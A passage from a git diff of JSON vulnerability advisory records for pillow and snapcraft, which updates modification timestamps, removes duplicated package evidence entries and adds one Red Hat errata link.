"subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-22816.json b/advisories/BREW-pillow-CVE-2022-22816.json index 90655ac682..19792606b3 100644 --- a/advisories/BREW-pillow-CVE-2022-22816.json +++ b/advisories/BREW-pillow-CVE-2022-22816.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-22816", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-22816", "BIT-pillow-2022-22816", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-22817.json b/advisories/BREW-pillow-CVE-2022-22817.json index 2db3ba8b0e..970ee905bd 100644 --- a/advisories/BREW-pillow-CVE-2022-22817.json +++ b/advisories/BREW-pillow-CVE-2022-22817.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-22817", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-22817", "BIT-pillow-2022-22817", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-24303.json b/advisories/BREW-pillow-CVE-2022-24303.json index 88fe821eda..6be09d32a5 100644 --- a/advisories/BREW-pillow-CVE-2022-24303.json +++ b/advisories/BREW-pillow-CVE-2022-24303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-24303", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-24303", "BIT-pillow-2022-24303", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-30595.json b/advisories/BREW-pillow-CVE-2022-30595.json index 94dceb89fb..fe07e1253f 100644 --- a/advisories/BREW-pillow-CVE-2022-30595.json +++ b/advisories/BREW-pillow-CVE-2022-30595.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-30595", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-30595", "BIT-pillow-2022-30595", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-45198.json b/advisories/BREW-pillow-CVE-2022-45198.json index 037f7623f9..ed63f3f2ca 100644 --- a/advisories/BREW-pillow-CVE-2022-45198.json +++ b/advisories/BREW-pillow-CVE-2022-45198.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-45198", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-45198", "BIT-pillow-2022-45198", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2022-45199.json b/advisories/BREW-pillow-CVE-2022-45199.json index 6d67d5eca9..1206d6d8ec 100644 --- a/advisories/BREW-pillow-CVE-2022-45199.json +++ b/advisories/BREW-pillow-CVE-2022-45199.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2022-45199", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2022-45199", "BIT-pillow-2022-45199", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2023-44271.json b/advisories/BREW-pillow-CVE-2023-44271.json index 56d77deed2..0fbab1f2ae 100644 --- a/advisories/BREW-pillow-CVE-2023-44271.json +++ b/advisories/BREW-pillow-CVE-2023-44271.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2023-44271", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2023-44271", "BIT-pillow-2023-44271", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2023-4863.json b/advisories/BREW-pillow-CVE-2023-4863.json index df1092dbae..08251c9836 100644 --- a/advisories/BREW-pillow-CVE-2023-4863.json +++ b/advisories/BREW-pillow-CVE-2023-4863.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2023-4863", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-j7hp-h8jx-5ppr", "A-299477569", @@ -45,13 +45,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2023-50447.json b/advisories/BREW-pillow-CVE-2023-50447.json index 63e2f7f93b..90129f6e67 100644 --- a/advisories/BREW-pillow-CVE-2023-50447.json +++ b/advisories/BREW-pillow-CVE-2023-50447.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2023-50447", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2023-50447", "BIT-pillow-2023-50447", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2024-28219.json b/advisories/BREW-pillow-CVE-2024-28219.json index 52cfc30daf..4f1ba23f92 100644 --- a/advisories/BREW-pillow-CVE-2024-28219.json +++ b/advisories/BREW-pillow-CVE-2024-28219.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2024-28219", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2024-28219", "BIT-pillow-2024-28219", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2025-48379.json b/advisories/BREW-pillow-CVE-2025-48379.json index 50b8898f8f..aaeaa41653 100644 --- a/advisories/BREW-pillow-CVE-2025-48379.json +++ b/advisories/BREW-pillow-CVE-2025-48379.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2025-48379", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2025-48379", "BIT-pillow-2025-48379", @@ -48,20 +48,6 @@ "subject_version": "12.3.0", "key": "https://github.com/python-pillow/pillow" }, - { - "strategy": "git", - "ecosystem": "GIT", - "name": "https://github.com/python-pillow/pillow", - "subject_version": "12.3.0", - "key": "https://github.com/python-pillow/pillow" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2026-25990.json b/advisories/BREW-pillow-CVE-2026-25990.json index 31a30bf3d4..cb32482e97 100644 --- a/advisories/BREW-pillow-CVE-2026-25990.json +++ b/advisories/BREW-pillow-CVE-2026-25990.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-25990", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-25990", "BIT-pillow-2026-25990", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-40192.json b/advisories/BREW-pillow-CVE-2026-40192.json index a9dd710c9a..bbd36778c1 100644 --- a/advisories/BREW-pillow-CVE-2026-40192.json +++ b/advisories/BREW-pillow-CVE-2026-40192.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-40192", "published": "2026-08-13T17:28:20Z", - "modified": "2026-09-02T09:39:33Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-40192", "BIT-pillow-2026-40192", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", @@ -215,6 +208,10 @@ "type": "ADVISORY", "url": "https://access.redhat.com/errata/RHSA-2026:61629" }, + { + "type": "ADVISORY", + "url": "https://access.redhat.com/errata/RHSA-2026:65126" + }, { "type": "ADVISORY", "url": "https://access.redhat.com/security/cve/CVE-2026-40192" diff --git a/advisories/BREW-pillow-CVE-2026-42308.json b/advisories/BREW-pillow-CVE-2026-42308.json index 8003803d73..eaf93f46e4 100644 --- a/advisories/BREW-pillow-CVE-2026-42308.json +++ b/advisories/BREW-pillow-CVE-2026-42308.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-42308", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-42308", "BIT-pillow-2026-42308", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-42309.json b/advisories/BREW-pillow-CVE-2026-42309.json index a7f69bf661..24294863d3 100644 --- a/advisories/BREW-pillow-CVE-2026-42309.json +++ b/advisories/BREW-pillow-CVE-2026-42309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-42309", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-42309", "BIT-pillow-2026-42309", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-42310.json b/advisories/BREW-pillow-CVE-2026-42310.json index e0dadc8691..621d6c7b7f 100644 --- a/advisories/BREW-pillow-CVE-2026-42310.json +++ b/advisories/BREW-pillow-CVE-2026-42310.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-42310", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-42310", "BIT-pillow-2026-42310", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-42311.json b/advisories/BREW-pillow-CVE-2026-42311.json index 242433b0cd..e5f6930311 100644 --- a/advisories/BREW-pillow-CVE-2026-42311.json +++ b/advisories/BREW-pillow-CVE-2026-42311.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-42311", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-42311", "BIT-pillow-2026-42311", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-54058.json b/advisories/BREW-pillow-CVE-2026-54058.json index d427237b8a..ea5884f328 100644 --- a/advisories/BREW-pillow-CVE-2026-54058.json +++ b/advisories/BREW-pillow-CVE-2026-54058.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-54058", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-54058", "BIT-pillow-2026-54058", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-54059.json b/advisories/BREW-pillow-CVE-2026-54059.json index 453eb25e74..15243cb7f5 100644 --- a/advisories/BREW-pillow-CVE-2026-54059.json +++ b/advisories/BREW-pillow-CVE-2026-54059.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-54059", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-54059", "BIT-pillow-2026-54059", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-54060.json b/advisories/BREW-pillow-CVE-2026-54060.json index 9622c6e070..2dce72229f 100644 --- a/advisories/BREW-pillow-CVE-2026-54060.json +++ b/advisories/BREW-pillow-CVE-2026-54060.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-54060", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-54060", "BIT-pillow-2026-54060", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-55379.json b/advisories/BREW-pillow-CVE-2026-55379.json index 8af9949a19..c20de4a1a2 100644 --- a/advisories/BREW-pillow-CVE-2026-55379.json +++ b/advisories/BREW-pillow-CVE-2026-55379.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-55379", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-55379", "BIT-pillow-2026-55379", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-55380.json b/advisories/BREW-pillow-CVE-2026-55380.json index 9e503c3eee..1fa7fddd6f 100644 --- a/advisories/BREW-pillow-CVE-2026-55380.json +++ b/advisories/BREW-pillow-CVE-2026-55380.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-55380", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-55380", "BIT-pillow-2026-55380", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-55798.json b/advisories/BREW-pillow-CVE-2026-55798.json index 0f1ae9de2b..c6b7634f46 100644 --- a/advisories/BREW-pillow-CVE-2026-55798.json +++ b/advisories/BREW-pillow-CVE-2026-55798.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-55798", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-55798", "BIT-pillow-2026-55798", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Ubuntu", diff --git a/advisories/BREW-pillow-CVE-2026-59197.json b/advisories/BREW-pillow-CVE-2026-59197.json index 6f375b5e38..2b463e22e8 100644 --- a/advisories/BREW-pillow-CVE-2026-59197.json +++ b/advisories/BREW-pillow-CVE-2026-59197.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59197", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59197", "BIT-pillow-2026-59197", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59198.json b/advisories/BREW-pillow-CVE-2026-59198.json index ae76276ce1..b501302960 100644 --- a/advisories/BREW-pillow-CVE-2026-59198.json +++ b/advisories/BREW-pillow-CVE-2026-59198.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59198", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59198", "BIT-pillow-2026-59198", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59199.json b/advisories/BREW-pillow-CVE-2026-59199.json index c839d43d44..42e3b879fa 100644 --- a/advisories/BREW-pillow-CVE-2026-59199.json +++ b/advisories/BREW-pillow-CVE-2026-59199.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59199", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59199", "BIT-pillow-2026-59199", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59200.json b/advisories/BREW-pillow-CVE-2026-59200.json index c51ea8d5f1..2e3b9c0acb 100644 --- a/advisories/BREW-pillow-CVE-2026-59200.json +++ b/advisories/BREW-pillow-CVE-2026-59200.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59200", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59200", "BIT-pillow-2026-59200", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59203.json b/advisories/BREW-pillow-CVE-2026-59203.json index 48b9997fa2..5e49f9b6f3 100644 --- a/advisories/BREW-pillow-CVE-2026-59203.json +++ b/advisories/BREW-pillow-CVE-2026-59203.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59203", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59203", "BIT-pillow-2026-59203", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59204.json b/advisories/BREW-pillow-CVE-2026-59204.json index 42d42526d9..1112cb6fe5 100644 --- a/advisories/BREW-pillow-CVE-2026-59204.json +++ b/advisories/BREW-pillow-CVE-2026-59204.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59204", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59204", "BIT-pillow-2026-59204", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2026-59205.json b/advisories/BREW-pillow-CVE-2026-59205.json index 5da66571ff..082ab3af38 100644 --- a/advisories/BREW-pillow-CVE-2026-59205.json +++ b/advisories/BREW-pillow-CVE-2026-59205.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2026-59205", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2026-59205", "BIT-pillow-2026-59205", @@ -55,13 +55,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-snapcraft-CVE-2009-5042.json b/advisories/BREW-snapcraft-CVE-2009-5042.json index c6e599b275..97384dfcfe 100644 --- a/advisories/BREW-snapcraft-CVE-2009-5042.json +++ b/advisories/BREW-snapcraft-CVE-2009-5042.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2009-5042", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-cg75-6938-wx58", "CVE-2009-5042", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "docutils", - "subject_version": "0.23", - "key": "pkg:pypi/docutils@0.23", - "resource": "docutils" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2012-4571.json b/advisories/BREW-snapcraft-CVE-2012-4571.json index 9f51ec0d8a..f80fe0bde0 100644 --- a/advisories/BREW-snapcraft-CVE-2012-4571.json +++ b/advisories/BREW-snapcraft-CVE-2012-4571.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2012-4571", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-p3h7-3c45-qj4v", "CVE-2012-4571", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2012-5577.json b/advisories/BREW-snapcraft-CVE-2012-5577.json index 745b3daf9d..7bbd1ce900 100644 --- a/advisories/BREW-snapcraft-CVE-2012-5577.json +++ b/advisories/BREW-snapcraft-CVE-2012-5577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2012-5577", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-p86x-652p-6385", "CVE-2012-5577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2012-5578.json b/advisories/BREW-snapcraft-CVE-2012-5578.json index 728579a913..2be105ff4d 100644 --- a/advisories/BREW-snapcraft-CVE-2012-5578.json +++ b/advisories/BREW-snapcraft-CVE-2012-5578.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2012-5578", "published": "2026-08-13T17:35:45Z", - "modified": "2026-08-13T17:35:45Z", + "modified": "2026-09-10T20:54:16Z", "upstream": [ "GHSA-8867-vpm3-g98g", "CVE-2012-5578", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "keyring", - "subject_version": "25.7.0", - "key": "pkg:pypi/keyring@25.7.0", - "resource": "keyring" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snapcraft-CVE-2013-1633.json b/advisories/BREW-snapcraft-CVE-2013-1633.json index cd670dfbda..3a2d151597 100644 --- a/advisories/BREW-snapcraft-CVE-2013-1633.json +++ b/advisories/BREW-snapcraft-CVE-2013-1633.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snapcraft-CVE-2013-1633", "published": "2026-08-13T17:35:45Z", - "modified": 